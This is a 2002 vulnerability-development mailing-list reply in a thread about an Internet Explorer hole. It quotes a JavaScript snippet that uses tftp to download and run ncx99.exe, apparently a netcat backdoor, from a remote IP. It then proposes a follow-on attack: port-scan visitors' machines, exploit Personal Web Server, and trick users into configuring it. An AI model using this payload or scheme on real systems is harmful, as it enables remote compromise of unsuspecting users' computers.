Vulnerability Development mailing list archives
RE: Rather large MSIE-hole
From: "Wall, Kevin" <Kevin.Wall () qwest com>
Date: Thu, 14 Mar 2002 13:37:10 -0500
Felipe Franciosi wrote...
var programName=new Array( 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe', 'c:/winnt/system32/ncx99.exe', );MS Windows 9x don't have trivial ftp client by default... I was thinking how this could be exploitable on these versions... The FTP client offers the option to read a text-file containing line separated commands. But I couldn't get to work something like: var prog... 'c:/command.com /c echo bin > c:/list.txt', 'c:/command.com /c echo GET something >> c:/list.txt' this won't create 'list.txt'... Any ideas why? Or how some could get around it?
On Win9x systems, rather than targeting FTP or a command shell, what about starting up something that simply causes a exploitable process to listen on some port # (will vary, depending on application) and then separately trying to exploit that. One could monitor one's web server access logs to notice when someone downloaded the first half of the exploit (the innerhtml hole). (Alternately, write a servlet/JSP/CGI script and you don't even need to monitor the log file.) If the User-Agent corresponds to MSIE, then at some time late (perhaps wait t minutes later), gently port scan the remote IP address to see if the application was launched. If the port scan succeeds, then go into full exploit mode. (This assumes an exploitable application that is normally not running and no pesky personal firewalls, etc. to be sure. But certainly some combinations would be vulnerable given the cluelessness of the typical Windoze users and their disdain for ever updating their system with security patches.) A bigger assumption is choosing an exploitable application that (preferably) launches without user intervention or requires any command line arguments. I don't know that much about Windoze apps, so all I have is one candidate application [see below.] (I do all my development for Solaris; I just have to use WinNT & LookOut! from work--sigh). However, the "Personal Web Server" that comes with Win98 (and perhaps other Windoze systems?) comes to mind as a possibility. The Personal Web Server is so full of holes that the executable name is probably 'swisscheese.exe'. I seem to recall doing a Win9x re-install for a friend where I think I was prompted as to whether I wanted to RUN it, but I don't remember it prompting if I wanted to load it. IIRC, that might mean that it was installed, but just not started, by default. (Or perhaps it's part of a commonly choosen package.) I never ran PWS, so I don't know if the Personal Web Server needs to be configured first to run or what. (If so, perhaps a bit of social engineering is in order. Tell people that a certain wizard dialog box is going to pop-up and and give them instructions how to configure it, making up some excuse as to why they should do this. Surely someone would fall for it.) The "good" thing about the Personal Web Server is that I believe that Microsoft's attitude with it with respect to security vulnerabilities has been pretty much to ignore them and to tell people to run IIS instead (since IIS is so much more secure ;-). Anyway, just my $.02 worth. BTW, just so you know, these are my personal opinions and in no way reflect the views of my company. --- Kevin W. Wall Qwest IT, Inc. / Security Infrastructure Dev Team Kevin.Wall () qwest com Phone: 614.932.5542 "Wipe Info uses hexadecimal values to wipe files. This provides more security than wiping with decimal values." -- Norton System Works 2002 manual, pg 160
Current thread:
- Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this), (continued)
- Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- Re: Rather large MSIE-hole foo BAR (Mar 12)
- RE: Rather large MSIE-hole Jim Harrison (SPG) (Mar 13)
- Re: Rather large MSIE-hole Raul Dias (Mar 13)
- RE: Rather large MSIE-hole Maarten Oosterink (Mar 14)
- Re: Rather large MSIE-hole Syzop (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Keegan (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Eric V Brown (Mar 14)
- RE: Rather large MSIE-hole Wall, Kevin (Mar 14)
- Re: Rather large MSIE-hole Paul D. Campbell (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- RE: Rather large MSIE-hole Chad Thunberg (Mar 15)
- Re: Rather large MSIE-hole Joerg Over (Mar 15)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole John Swensson (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole The Blueberry (Mar 14)
(Thread continues...)